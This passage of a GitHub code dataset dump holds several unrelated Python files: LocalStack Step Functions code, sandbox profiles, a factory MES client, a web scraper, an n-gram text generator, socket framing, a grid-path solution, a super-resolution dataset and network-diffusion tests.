ans","repo_name":"mengyuqianxun/coding-interview-Python","sub_path":"Leetcode/1579.py","file_name":"1579.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"14101872331","text":"from botocore.exceptions import ClientError\n\nfrom localstack.aws.api.stepfunctions import (\n    HistoryEventExecutionDataDetails,\n    HistoryEventType,\n    TaskFailedEventDetails,\n    TaskScheduledEventDetails,\n    TaskStartedEventDetails,\n    TaskSucceededEventDetails,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.custom_error_name import (\n    CustomErrorName,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.failure_event import (\n    FailureEvent,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.states_error_name import (\n    StatesErrorName,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.states_error_name_type import (\n    StatesErrorNameType,\n)\nfrom localstack.services.stepfunctions.asl.component.state.state_execution.state_task.service.state_task_service import (\n    StateTaskService,\n)\nfrom localstack.services.stepfunctions.asl.component.state.state_execution.state_task.state_task_lambda import (\n    LambdaFunctionErrorException,\n    StateTaskLambda,\n)\nfrom localstack.services.stepfunctions.asl.eval.environment import Environment\nfrom localstack.services.stepfunctions.asl.eval.event.event_detail import EventDetails\nfrom localstack.services.stepfunctions.asl.utils.encoding import to_json_str\n\n\nclass StateTaskServiceLambda(StateTaskService, StateTaskLambda):\n    @staticmethod\n    def _error_cause_from_client_error(client_error: ClientError) -> tuple[str, str]:\n        error_code: str = client_error.response[\"Error\"][\"Code\"]\n        error_msg: str = client_error.response[\"Error\"][\"Message\"]\n        response_details = \"; \".join(\n            [\n                \"Service: AWSLambda\",\n                f\"Status Code: {client_error.response['ResponseMetadata']['HTTPStatusCode']}\",\n                f\"Error Code: {error_code}\",\n                f\"Request ID: {client_error.response['ResponseMetadata']['RequestId']}\",\n                \"Proxy: null\",\n            ]\n        )\n        error = f\"Lambda.{error_code}\"\n        cause = f\"{error_msg} 
({response_details})\"\n return error, cause\n\n def _from_error(self, env: Environment, ex: Exception) -> FailureEvent:\n if isinstance(ex, LambdaFunctionErrorException):\n error = \"Exception\"\n error_name = CustomErrorName(error)\n cause = ex.payload\n elif isinstance(ex, ClientError):\n error, cause = self._error_cause_from_client_error(ex)\n error_name = CustomErrorName(error)\n else:\n error = \"Exception\"\n error_name = StatesErrorName(typ=StatesErrorNameType.StatesTaskFailed)\n cause = str(ex)\n\n return FailureEvent(\n error_name=error_name,\n event_type=HistoryEventType.TaskFailed,\n event_details=EventDetails(\n taskFailedEventDetails=TaskFailedEventDetails(\n error=error,\n cause=cause,\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n )\n ),\n )\n\n def _eval_execution(self, env: Environment) -> None:\n parameters = self._eval_parameters(env=env)\n parameters_str = to_json_str(parameters)\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskScheduled,\n event_detail=EventDetails(\n taskScheduledEventDetails=TaskScheduledEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n region=self.resource.region,\n parameters=parameters_str,\n )\n ),\n )\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskStarted,\n event_detail=EventDetails(\n taskStartedEventDetails=TaskStartedEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n )\n ),\n )\n\n super()._exec_lambda_function(env=env)\n response = env.stack[-1]\n\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskSucceeded,\n event_detail=EventDetails(\n taskSucceededEventDetails=TaskSucceededEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n output=to_json_str(response),\n outputDetails=HistoryEventExecutionDataDetails(truncated=False),\n )\n ),\n )\n","repo_name":"TRT-LewisH/neo4j_bulkloader","sub_path":"neo4j-rdfloader/Lib/site-packages/localstack/services/stepfunctions/asl/component/state/state_execution/state_task/service/state_task_service_lambda.py","file_name":"state_task_service_lambda.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40602202823","text":"from pathlib import Path\n\nfrom runbox.models import DockerProfile\n\nfrom bulb.models import LanguageProfile\n\ncpp17_profile = LanguageProfile(\n language='cpp',\n version='cpp-17',\n build_profile=DockerProfile(\n image='gcc10',\n workdir=Path('/build'),\n cmd_template=['g++', 'main.cpp', '--std=c++17', '/sandbox/build'],\n user='builder'\n ),\n profile=DockerProfile(\n image='gcc10',\n workdir=Path('/sandbox'),\n cmd_template=['/sandbox/build'],\n user='sandbox',\n ),\n)\n\ncpp11_profile = cpp17_profile.copy(update={\n 'version': 'cpp-11',\n 'build_profile': {\n 'cmd_template': ['g++', 'main.cpp', '--std=c++11', '/sandbox/build']\n }\n})\n\npython3_10_profile = LanguageProfile(\n language='python',\n version='3.10',\n profile=DockerProfile(\n image='python3.10-sandbox',\n workdir=Path('/sandbox'),\n cmd_template=['python', 'main.py'],\n user='sandbox',\n ),\n)\n\npython2_7_profile = LanguageProfile(\n language='python',\n version='2.7',\n profile=DockerProfile(\n image='python2.7-sandbox',\n workdir=Path('/sandbox'),\n cmd_template=['python', 'main.py'],\n user='sandbox',\n 
)\n)\n","repo_name":"burenotti/flask-editor-api","sub_path":"bulb/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25683869161","text":"#!usr/bin/env python \n# -*- coding:utf-8 _*-\n\"\"\" \n@author:Long.Hou\n@file: mes.py \n@time: 2022/01/07 \n@email:long.hou2@luxshare-ict.com\n\"\"\"\nimport os.path\nimport json\nimport time\n\nfrom Tools.logDriver import LogDriver\nimport requests\n\n'''200\n0 SFC_OK\nNO X BOAR'''\n\n'''\n0 SFC_OK tsid::SIP Measurement-A6-3F-S09-1::unit_process_check=UNIT OUT OF PROCESS TERMINAL_NAME ERROR!'''\n\n\nclass Mes:\n def __init__(self):\n self.url = 'http://10.100.2.69/Bobcat/Sfc_Response.aspx'\n self.config_path = os.path.expanduser(\"~/H26_SIP_Sorting/config.json\")\n self.log = LogDriver(os.path.expanduser(f\"~/H26_SIP_Sorting/MESLOG/MesLog{time.strftime('%Y%m%d%H%M')}.txt\"))\n try:\n if os.path.exists(self.config_path):\n with open(self.config_path, 'r') as f:\n self.config = json.load(f)\n except Exception as e:\n self.log.mes_error_log(url=self.url,data='Not found config.json file,pleace try again!',error=e)\n self.config= {}\n\n\n def get_SIP_X_num(self, sn):\n result = False, None\n try:\n data = {'p': \"SIP_X_NUM\", \"c\": \"QUERY_RECORD\", \"sn\": sn}\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name='get_SIP_X_num',url=self.url,data=data,response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n l1 = response.text.split(\"SFC_OK\")[1]\n if 'NO X BOAR' in l1:\n result = True, []\n else:\n result = True, map(int, l1.split(',')[1:])\n except Exception as e:\n result = False, \"get_SIP_X_num Error\\n{}\".format(e)\n return result\n\n def check_process(self, sn):\n result = False, \"Process Error\\n unit_process_check=UNIT OUT OF PROCESS TERMINAL_NAME ERROR!\"\n try:\n data = {'p': \"unit_process_check\", \"c\": \"QUERY_RECORD\", 'sw_version': self.config['sw_version'],\n 'tsid': self.config['station_id'],\"sn\": sn,'fixture_id': None}\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name=\"check_process\",url=self.url, data=data, response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n if response.text.endswith(\"unit_process_check=OK\"):\n result = True, 'unit_process_check=OK'\n else:\n result = False, 'Process Error\\n'+response.text.split('::')[-1]\n except Exception as e:\n result = False, \"check_process Error\\n{}\".format(e)\n return result\n\n def update_test_value_to_mes(self, data):\n '''\n :param data: data 为字典,其中要有result,audio_mode,start_time,stop_time,sn,\n fixture_id,test_head_id,list_of_failing_tests,failure_message\n :return:\n '''\n result = False\n try:\n for k in self.config.keys():\n data[k] = self.config[k]\n data[\"c\"] = \"ADD_RECORD\"\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name='update_test_value_to_mes',url=self.url, data=data, response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n result = True\n except Exception as e:\n self.log.mes_error_log(func_name='update_test_value_to_mes',url=self.url,data=data,error=e)\n result = False\n return result\n\n\nif __name__ == '__main__':\n mes = Mes()\n sn = 'CH26RB2102004CC'\n\n # mes.get_SIP_X_num(sn)\n # for i in range(10):\n # if i==9:\n # mes.check_process(\"{}{}\".format(sn,i+1))\n # else:\n # 
mes.check_process(\"{}0{}\".format(sn, i + 1))\n for i in range(1,10):\n data = {'result': 'PASS', 'audit_mode': 0, 'start_time': time.strftime(\"%H:%M:%S\"),\n 'stop_time': time.strftime(\"%H:%M:%S\"),\n 'sn': '{}0{}'.format(sn,i),\n 'fixture_id': i, 'test_head_id': i, 'list_of_failing_tests': '', 'failure_message': ''}\n # mes.update_test_value_to_mes(data)\n data = {'result': 'PASS', 'audit_mode': 0, 'start_time': time.strftime(\"%H:%M:%S\"),\n 'stop_time': time.strftime(\"%H:%M:%S\"),\n 'sn': '{}10'.format(sn),\n 'fixture_id': 10, 'test_head_id': 10, 'list_of_failing_tests': '', 'failure_message': ''}\n # mes.update_test_value_to_mes(data)\n mes.get_SIP_X_num(sn)","repo_name":"Faith-lyle/H26_SIP_sorting_5","sub_path":"Tools/mes.py","file_name":"mes.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36140477432","text":"from bs4 import BeautifulSoup\nimport requests\nfrom practice1 import getPhoneNumber\nfrom sys import argv\n\ndef searchYellowP():\n\tterm = argv[1]\n\tlocation = argv[2].split(\" \")\n\t# query = \"+\".join(term.split(' '))\n\tr = requests.get('http://www.yellowpages.com/search?search_terms=' + str(term) + '&geo_location_terms='+ location[0] +'%2C+CA')\n\tsoup = BeautifulSoup(r.content, \"html5lib\")\n\thtmlList = soup.find_all('div', {\"class\": \"info\"})\n\tfor item in htmlList:\n\t\tif getPhoneNumber(item.text) is not None:\n\t\t\tcompanyName = item.find_all('h3', {'class': 'n'})\n\t\t\tprint(getPhoneNumber(item.text).group(), companyName[0].text, term)\n\n\n\nsearchYellowP()\n","repo_name":"masakistewart/yellow-pages-cli-scraper","sub_path":"yellowPagesScrape.py","file_name":"yellowPagesScrape.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7156319160","text":"#!/usr/bin/env python3.4\n\nimport os\nimport json\nimport logging\nimport sys\nimport time\nimport datetime\n\nfrom argparse import ArgumentParser\nfrom models.markov_model import MarkovModel\nfrom models.ngram_model import NGramModel\nfrom lib.util import CONST_END_WORD\nfrom lib.util import computePerplexity\n\nFORMAT = \"%(asctime)s: %(name)s:%(lineno)d (%(process)d/%(threadName)s) - %(levelname)s - %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\nparser = ArgumentParser(description=\"Generate article based on input domain and topic using ngram model\")\nparser.add_argument('--filters', '-f', action='append',\n help='Filters for data collection')\nparser.add_argument('--domainList', '-d', action='append', required=True,\n help='Specify domain (news source) for training ngram')\nparser.add_argument('--generateDomain', '-D', action='store',\n help='Specify domain for generating article', required=True)\nparser.add_argument('--generateTopic', '-t', action='store',\n help='Specify topic for generating article', required=True)\nparser.add_argument('--sizeList', '-s', action='append',\n help='Number of of words in ngram')\nparser.add_argument('--basedir', '-b', action='store',\n help='directory for train data', required=True)\nparser.add_argument('--length', '-l', action='store', default=1000,\n help='Maximum number of words in generated article')\nparser.add_argument('--perplexity', '-p', action='store_true', default=False,\n help='Compute perplexity on test data')\nparser.add_argument('--generate', '-g', action='store_true', 
default=False,\n help='generate article')\nparser.add_argument('--testDir', '-T', action='store',\n help='directory for test data')\n\n\nargs = parser.parse_args()\n\nlogger.info(\"args: %s\" % args)\n\nfilters = []\nif args.filters:\n filters = args.filters\n\nmaxLength = int(args.length)\nwindowSizeList = [int(size) for size in args.sizeList]\nbaseDir = args.basedir\ndomainList = args.domainList\ngenerateDomain = args.generateDomain\ngenerateTopic = args.generateTopic\n\nstartTime = time.time()\nng = NGramModel(windowSizeList, generatePdf=args.generate, filters=filters)\nng.countNgrams(domainList, baseDir)\nnGramModel = ng.generateModel()\n\nngTypeCount = [key for key, _ in ng.ngramCount.items()]\n\nprint(\"vocab size: %s\" % ng.vocabSize)\nprint(\"ngram types: %s\" % len(ngTypeCount))\nfor size in windowSizeList:\n print(\"size of ngram model %s: %s\" % (size, sys.getsizeof(ng.nGramProb[size])))\n\nprint(\"Time elapsed: %s\" % str(datetime.timedelta(seconds=time.time()-startTime)))\n\nif args.generate:\n # For generating sentences use max window size\n windowSize = max(windowSizeList)\n mv = MarkovModel(nGramModel, windowSize, generateDomain, generateTopic)\n cState = mv.startState()\n article = []\n for _ in range(maxLength):\n cState = mv.generate(cState)\n cWord = cState[-1]\n if cWord == CONST_END_WORD:\n logger.debug(\"reached end of the article\")\n break\n\n article.append(cState[-1])\n\n print(\" \".join(article))\n\nif args.perplexity:\n if not args.testDir:\n raise Exception(\"Need to input test directory\")\n\n pvaluesList = []\n articleText = \"\"\n for (currDir, _, fileList) in os.walk(args.testDir):\n for filename in fileList:\n if filename.endswith('.json'):\n fullName = os.path.join(currDir, filename)\n # print(\"filename : %s\" % fullName)\n with open(fullName, \"r\") as f:\n cData = json.load(f)\n articleText += cData.get(\"article\", None)\n #articleText = cData.get(\"article\", None)\n #pvaluesList.append(computePerplexity(articleText, ng))\n\n #print(\"articleText: %s\" % articleText)\n pvaluesList.append(computePerplexity(articleText, ng))\n\n logger.debug(\"pvaluesList: %s\" % pvaluesList)\n logger.info(\"max perplexity: %s\" % max(pvaluesList))\n logger.info(\"mean perplexity: %s\" % (sum(pvaluesList)/len(pvaluesList)))\n logger.info(\"min perplexity: %s\" % min(pvaluesList))\n","repo_name":"arashjamalian/cs221_ngramModel","sub_path":"generate_article.py","file_name":"generate_article.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40144149693","text":"import json\nfrom Comm.Accumulator import *\nimport socket\n\n\ndef waitForConnection(address, port, maxConection, objetToNotifie=None):\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((address, port))\n server.listen(maxConection)\n\n conn, addr = server.accept()\n objetToNotifie.newConnection(conn)\n\nclass EthernetComm:\n\n JSONTYPE =1\n\n def __init__(self, socket):\n self.sock = socket\n self.sock.setblocking(False)\n self.acc = Accumulator(self)\n self.frameReceveList = []\n self.isSocketAlive = True\n\n def receveFrame(self, frame):\n self.frameReceveList.append(frame)\n\n\n def getSocket(self):\n return self.sock\n\n def readFrame(self):\n self.extractRecevedData()\n\n if len(self.frameReceveList) > 0:\n frameToReturn = self.frameReceveList[0]\n del self.frameReceveList[0]\n \n return frameToReturn\n else:\n return None\n\n def extractRecevedData(self):\n # check for new 
frame\n data = 1\n while data:\n try:\n data = self.sock.recv(1024)\n if not data:\n break\n else:\n self.acc.accumulate(data)\n except OSError:\n # no data currently available on the non-blocking socket\n return None\n\n def sendJSon(self, JSON):\n frame = self.JSONtoFrame(JSON)\n self.sendFrame(frame)\n\n def JSONtoFrame(self, JSON):\n msgPayload = bytearray(json.dumps(JSON).encode(encoding=\"UTF-8\"))\n frame = Frame()\n frame.setType(EthernetComm.JSONTYPE)\n frame.setPayloadSize(len(msgPayload))\n frame.writeBytesToPayload(msgPayload)\n return frame\n\n def isMessageAvailable(self):\n self.extractRecevedData()\n\n for frame in self.frameReceveList:\n if frame.getType() == EthernetComm.JSONTYPE:\n return True\n return False\n\n def readJSon(self):\n self.extractRecevedData()\n for frame in self.frameReceveList:\n if frame.getType() == EthernetComm.JSONTYPE:\n self.frameReceveList.remove(frame)\n return json.loads(str(frame.getPayload().decode()))\n return None\n\n def isAlive(self):\n return self.isSocketAlive\n\n def closeConnection(self):\n self.sock.close()\n\n def sendFrame(self, frame):\n data = self.sock.send(frame.toBytes())\n\n","repo_name":"chameau5050/Handling-Gro","sub_path":"Application/Comm/EthernetComm.py","file_name":"EthernetComm.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"40021811108","text":"# Programmers: 등굣길 (School Road)\n\ndef solution(m, n, puddles):\n    answer = 0\n    dp = [[0 for _ in range(m+1)] for _ in range(n+1)] # build a grid indexed 0..n, 0..m; only indices 1..n, 1..m are used\n    mod = 1000000007\n    for v in puddles: # mark the puddles with -1\n        a,b = v\n        dp[b][a] = -1\n\n    dp[1][1] = 1 # starting point\n\n    for i in range(1,n+1): # iterate from 1 to n and from 1 to m\n        for j in range(1,m+1):\n            if(dp[i][j] == -1): # if this cell is a puddle, set it to 0 so it does not affect later cells\n                dp[i][j] = 0\n            else:\n                dp[i][j] += (dp[i][j-1] + dp[i-1][j]) % mod # use += so the seed value at dp[1][1] is preserved\n\n    return dp[n][m] % mod\n\nm = 4\nn = 3\npuddles = [[2,2]]\nprint(solution(m, n, puddles))","repo_name":"geonwoomun/AlgorithmStudy","sub_path":"programmers/level3/pro42898.py","file_name":"pro42898.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"31964508060","text":"\"\"\"\nDataset file\n\"\"\"\nfrom pathlib import Path\nimport json\nimport random\nimport os\n\n# from matplotlib import pyplot as plt\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Compose\nimport torch.nn.functional as F\nimport scipy.ndimage\nimport numpy as np\nfrom cutter import loader\nfrom skimage.transform import resize\n\n\nclass SrDataset(Dataset):\n    \"\"\"Dataset class for loading large amounts of image array data\"\"\"\n\n    def __init__(self, root_dir, lognorm=False, test=False, hr=True):\n        \"\"\"\n        Args:\n            root_dir (string): Directory with all the images.\n            lognorm: True if we are using log normalization\n            test: True only for the test dataset\n            hr: True if the input is an HR image and the LR image is computed from it\n            transform (callable, optional): Optional transform to be applied\n                on a sample.\n        \"\"\"\n        self.root_dir = Path(root_dir).expanduser().resolve().absolute()\n        self.datalist = list(self.root_dir.rglob(\"*.npy\"))\n        self.lognorm = lognorm\n        self.test = test\n        self.hr = hr\n        self.statlist = []\n        for fname in self.datalist:\n            file_path = Path(fname)\n            stat_file = json.load(open(str(file_path.parent / \"stats.json\")))\n            self.statlist.append(stat_file)\n        print(\"Total number of data elements found = \", len(self.datalist))\n\n    def __len__(self):\n        return len(self.datalist)\n\n    def 
__getitem__(self, idx):\n        img_name = Path(self.datalist[idx])\n        filename = os.path.basename(img_name)\n        filename = filename.split('.')[0]\n        stats = self.statlist[idx]\n        if self.hr:\n            hr_image = loader(img_name)\n            if not self.test:\n                if stats[\"std\"] <= 0.001:\n                    stats[\"std\"] = 1\n                hr_image = Normalize()(hr_image, stats)\n        \n        if self.hr:\n            lr_image = scipy.ndimage.zoom(scipy.ndimage.zoom(hr_image, 0.25), 4.0)\n        else:\n            lr_image = loader(img_name)\n            hr_image = np.zeros_like(lr_image)\n        if not self.test:\n            sample = {\"lr\": lr_image, \"lr_un\": lr_image, \"hr\": hr_image, \"stats\": stats, \"file\": filename}\n            transforms = Compose(\n                [Rotate(), Transpose(), HorizontalFlip(), VerticalFlip(),\n                 Reshape(), ToFloatTensor()]\n            )\n            for i, trans in enumerate([transforms]):\n                sample = trans(sample)\n        else:\n            lr_unorm = lr_image.copy()\n            if stats[\"std\"] <= 0.001:\n                stats[\"std\"] = 1\n            lr_image = Normalize()(lr_image, stats)\n            sample = {\"lr\": lr_image, \"lr_un\": lr_unorm, \"hr\": hr_image, \"stats\": stats, \"file\": filename}\n            transforms = Compose(\n                [Reshape(), ToFloatTensor()]\n            )\n            sample = transforms(sample)\n        return sample\n\n\n\"\"\"\nif __name__ == \"__main__\":\n    face_dataset = SrDataset(root_dir='../data')\n\n    fig = plt.figure()\n\n    for i in range(len(face_dataset)):\n        sample = face_dataset[i]\n\n        print(i, sample['hr'].shape, sample['stats'])\n\n        ax = plt.subplot(1, 4, i + 1)\n        plt.tight_layout()\n        ax.set_title('Sample #{}'.format(i))\n        ax.axis('off')\n        plt.imshow(sample['lr'])\n\n        if i == 3:\n            plt.show()\n            break\n\"\"\"\n\n\nclass Rotate:\n    \"\"\"Rotate class rotates image array\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing transformed lr and transformed hr\n        \"\"\"\n        for i in range(random.randint(0, 3)):\n            sample[\"hr\"] = np.rot90(sample[\"hr\"])\n            sample[\"lr\"] = np.rot90(sample[\"lr\"])\n\n        return sample\n\n\nclass ToFloatTensor:\n    \"\"\"This class is for converting the image array to Float Tensor\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing transformed lr and transformed hr\n        \"\"\"\n        sample[\"hr\"] = np.ascontiguousarray(sample[\"hr\"])\n        sample[\"lr\"] = np.ascontiguousarray(sample[\"lr\"])\n        sample[\"hr\"] = torch.tensor(sample[\"hr\"], dtype=torch.float32)\n        sample[\"lr\"] = torch.tensor(sample[\"lr\"], dtype=torch.float32)\n        return sample\n\n\nclass Transpose:\n    \"\"\"Transpose class calculates the transpose of the matrix\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing transformed lr and transformed hr\n        \"\"\"\n        if random.randint(1, 10) > 5:\n            sample[\"hr\"] = np.transpose(sample[\"hr\"])\n            sample[\"lr\"] = np.transpose(sample[\"lr\"])\n\n        return sample\n\nclass VerticalFlip:\n    \"\"\"VerticalFlip class to probabilistically return vertical flip of the matrix\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing transformed lr and transformed hr\n        \"\"\"\n        if random.randint(1, 10) > 5:\n            sample[\"hr\"] = np.flipud(sample[\"hr\"])\n            sample[\"lr\"] = np.flipud(sample[\"lr\"])\n\n        return sample\n\nclass HorizontalFlip:\n    \"\"\"HorizontalFlip class to probabilistically 
return horizontal flip of the matrix\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing transformed lr and transformed hr\n        \"\"\"\n        if random.randint(1, 10) > 5:\n            sample[\"hr\"] = np.fliplr(sample[\"hr\"])\n            sample[\"lr\"] = np.fliplr(sample[\"lr\"])\n\n        return sample\n\n\nclass Reshape:\n    \"\"\"Reshaping tensors\"\"\"\n\n    def __call__(self, sample):\n        \"\"\"\n\n        Parameters\n        ----------\n        sample: dictionary containing lr, hr and stats\n\n        Returns\n        -------\n        sample: dictionary containing reshaped lr and reshaped hr\n        \"\"\"\n        width = sample[\"hr\"].shape[-1]\n        sample[\"hr\"] = np.reshape(sample[\"hr\"], (1, -1, width))\n        sample[\"lr\"] = np.reshape(sample[\"lr\"], (1, -1, width))\n        sample[\"lr_un\"] = np.reshape(sample[\"lr_un\"], (1, -1, width))\n        return sample\n\n\nclass Normalize:\n    \"\"\"Normalizing the high resolution image using mean and standard deviation\"\"\"\n\n    def __call__(self, hr_image, stats):\n        \"\"\"\n\n        Parameters\n        ----------\n        hr_image: high resolution image\n        stats: containing mean and standard deviation\n\n        Returns\n        -------\n        hr_image: returns normalized hr image\n        \"\"\"\n        return (hr_image - stats[\"mean\"]) / stats[\"std\"]\n","repo_name":"ahanagemini/active_learning_sr","sub_path":"sr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"18676986749","text":"import os\nimport unittest\nfrom tempfile import TemporaryDirectory\n\nimport networkx as nx\nimport pandas as pd\n\nfrom network_diffusion import MultilayerNetwork, Simulator\nfrom network_diffusion.models import DSAAModel\nfrom network_diffusion.simulator import Logger\nfrom network_diffusion.tests.models.test_dsaa_model import prepare_compartments\n\n\ndef prepare_logs():\n    \"\"\"Prepare logs for tests of Logger class.\"\"\"\n    return (\n        {\n            \"ill\": ((\"S\", 47), (\"I\", 30)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n        },\n        {\n            \"ill\": ((\"S\", 38), (\"I\", 39)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n        },\n        {\n            \"ill\": ((\"I\", 42), (\"S\", 35)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n        },\n        {\n            \"ill\": ((\"I\", 49), (\"S\", 28)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 6), (\"V\", 71)),\n        },\n        {\n            \"ill\": ((\"I\", 56), (\"S\", 21)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 6), (\"V\", 71)),\n        },\n        {\n            \"ill\": ((\"I\", 58), (\"S\", 19)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n        },\n        {\n            \"ill\": ((\"I\", 60), (\"S\", 17)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n        },\n        {\n            \"ill\": ((\"I\", 65), (\"S\", 12)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n        },\n        {\n            \"ill\": ((\"I\", 65), (\"S\", 12)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n        },\n        {\n            \"ill\": ((\"I\", 67), (\"S\", 10)),\n            \"aware\": ((\"A\", 69), (\"UA\", 8)),\n            \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n        },\n    )\n\n\nclass TestLogger(unittest.TestCase):\n    \"\"\"Test class for the Logger class.\"\"\"\n\n    def setUp(self):\n        \"\"\"Set up most common testing parameters.\"\"\"\n        compartments, phenomena = prepare_compartments()\n        self.phenomena = 
phenomena\n\n # init multilayer network from nx predefined network\n network = MultilayerNetwork.from_nx_layer(\n nx.les_miserables_graph(), [*phenomena.keys()]\n )\n self.network = network\n\n # init model\n self.model = DSAAModel(compartments)\n self.model.compartments.seeding_budget = {\n \"ill\": (65, 35, 0),\n \"aware\": (39, 61),\n \"vacc\": (13, 87),\n }\n\n experiment = Simulator(self.model, self.network)\n self.logs = experiment.perform_propagation(70)\n\n def test_plot(self):\n \"\"\"Check if visualisation is being stored.\"\"\"\n with TemporaryDirectory() as out_dir:\n self.logs.plot(True, out_dir)\n self.assertTrue(\n \"visualisation.png\" in os.listdir(out_dir),\n f\"After creating visualisation a gif file of name \"\n f\"visualisation.png in {out_dir} should be saved!\",\n )\n\n def test_report(self):\n \"\"\"Check if report function writes out all files that it should.\"\"\"\n with TemporaryDirectory() as out_dir:\n self.logs.report(visualisation=True, path=out_dir)\n exp_files = {\n \"ill_propagation_report.csv\",\n \"model_report.txt\",\n \"network_report.txt\",\n \"visualisation.png\",\n \"vacc_propagation_report.csv\",\n \"aware_propagation_report.csv\",\n \"local_stats.json\",\n }\n real_files = set(os.listdir(out_dir))\n self.assertEqual(\n real_files,\n exp_files,\n f\"Report function should produce following files: {exp_files},\"\n f\" but produced {real_files}\",\n )\n\n def test__convert_logs(self):\n \"\"\"Check if logs convention is done properly.\"\"\"\n raw_logs = prepare_logs()\n\n model_hyperparams = {\n \"ill\": (\"S\", \"I\", \"R\"),\n \"aware\": (\"UA\", \"A\"),\n \"vacc\": (\"UV\", \"V\"),\n }\n\n exp_ill = pd.DataFrame(\n {\n \"S\": {\n 0: 47,\n 1: 38,\n 2: 35,\n 3: 28,\n 4: 21,\n 5: 19,\n 6: 17,\n 7: 12,\n 8: 12,\n 9: 10,\n },\n \"I\": {\n 0: 30,\n 1: 39,\n 2: 42,\n 3: 49,\n 4: 56,\n 5: 58,\n 6: 60,\n 7: 65,\n 8: 65,\n 9: 67,\n },\n \"R\": {\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 0,\n 4: 0,\n 5: 0,\n 6: 0,\n 7: 0,\n 8: 0,\n 9: 0,\n },\n }\n )\n exp_aware = pd.DataFrame(\n {\n \"UA\": {\n 0: 8,\n 1: 8,\n 2: 8,\n 3: 8,\n 4: 8,\n 5: 8,\n 6: 8,\n 7: 8,\n 8: 8,\n 9: 8,\n },\n \"A\": {\n 0: 69,\n 1: 69,\n 2: 69,\n 3: 69,\n 4: 69,\n 5: 69,\n 6: 69,\n 7: 69,\n 8: 69,\n 9: 69,\n },\n }\n )\n exp_vacc = pd.DataFrame(\n {\n \"UV\": {\n 0: 9,\n 1: 9,\n 2: 9,\n 3: 6,\n 4: 6,\n 5: 5,\n 6: 5,\n 7: 5,\n 8: 5,\n 9: 